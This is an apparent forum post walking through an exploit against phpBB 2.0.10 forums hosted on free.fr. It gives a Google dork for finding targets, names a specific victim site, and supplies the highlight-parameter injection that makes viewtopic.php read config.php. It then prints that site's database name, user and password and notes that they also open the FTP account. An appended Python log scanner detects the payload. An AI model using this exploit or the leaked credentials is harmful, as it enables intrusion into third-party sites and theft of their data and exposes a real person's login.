First of all, this exploit works on phpBB 2.0.10 hosted by free.fr, a French web provider. So, the Google search: 2.0.10 © 2001, 2002 phpBB Group inurl:free.fr
Then you have an example victim: http://romain.matu.free.fr/phpBB2/
Now go to a topic and take the topic ID.
Paste: viewtopic.php?a=config.php&t=TOPICID&highlight=%2527.readfile($HTTP_GET_VARS[a]).%2527
Result: http://romain.matu.free.fr/phpBB2/viewtopic.php?a=config.php&t=460&highlight=%2527.readfile($HTTP_GET_VARS[a]).%2527
Finally, look at the source of the page, and somewhere the following will appear:
<?php
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
$dbms = 'mysql';
$dbhost = 'sql.free.fr';
$dbname = 'romain.matu';
$dbuser = 'romain.matu';
$dbpasswd = 'nintendo';
$table_prefix = 'phpbb_';
define('PHPBB_INSTALLED', true);
?>
With Free.fr, the SQL database login/password are the same as for the FTP account.
FTP address: ftpperso.free.fr
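The request above depends on %2527, a double-URL-encoded single quote, reaching the highlight parameter of viewtopic.php. As an added example (not part of the original post), this Python check flags such requests in a web server access log; the Apache combined log format and the constructed sample lines are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
PCT_RE = re.compile(r"%[0-9A-Fa-f]{2}")
# Characters a highlight search term does not need, but string breakout
# and a PHP call do.
SUSPICIOUS_RE = re.compile(r"['\"`$();]")

# Constructed sample access-log lines (addresses, dates and sizes are made up).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2005:10:01:22 +0100] "GET /phpBB2/viewtopic.php?t=460&highlight=install+guide HTTP/1.1" 200 18233',
    '198.51.100.7 - - [01/Jan/2005:10:02:05 +0100] "GET /phpBB2/viewtopic.php?a=config.php&t=460&highlight=%2527.readfile($HTTP_GET_VARS[a]).%2527 HTTP/1.1" 200 19544',
    '192.0.2.10 - - [01/Jan/2005:10:03:40 +0100] "GET /phpBB2/viewtopic.php?t=12&highlight=caf%C3%A9 HTTP/1.1" 200 17002',
    '192.0.2.33 - - [01/Jan/2005:10:04:11 +0100] "GET /phpBB2/index.php HTTP/1.1" 200 9021',
]

def fully_decode(value, max_rounds=5):
    """URL-decode until stable, so %2527 -> %27 -> ' is seen in final form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def check_line(line):
    """Return (decoded_highlight, double_encoded) for a suspect line, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/viewtopic.php"):
        return None
    # parse_qsl performs the first decoding pass, as the web server would.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name != "highlight":
            continue
        decoded = fully_decode(value)
        if SUSPICIOUS_RE.search(decoded):
            return decoded, bool(PCT_RE.search(value))
    return None

def scan(lines):
    """Return [(line_number, decoded_highlight, double_encoded)] for hits."""
    checked = ((n, check_line(line)) for n, line in enumerate(lines, 1))
    return [(n, *hit) for n, hit in checked if hit]
```

A hit with double_encoded set to True is the stronger signal, since an ordinary search term has no reason to arrive encoded twice.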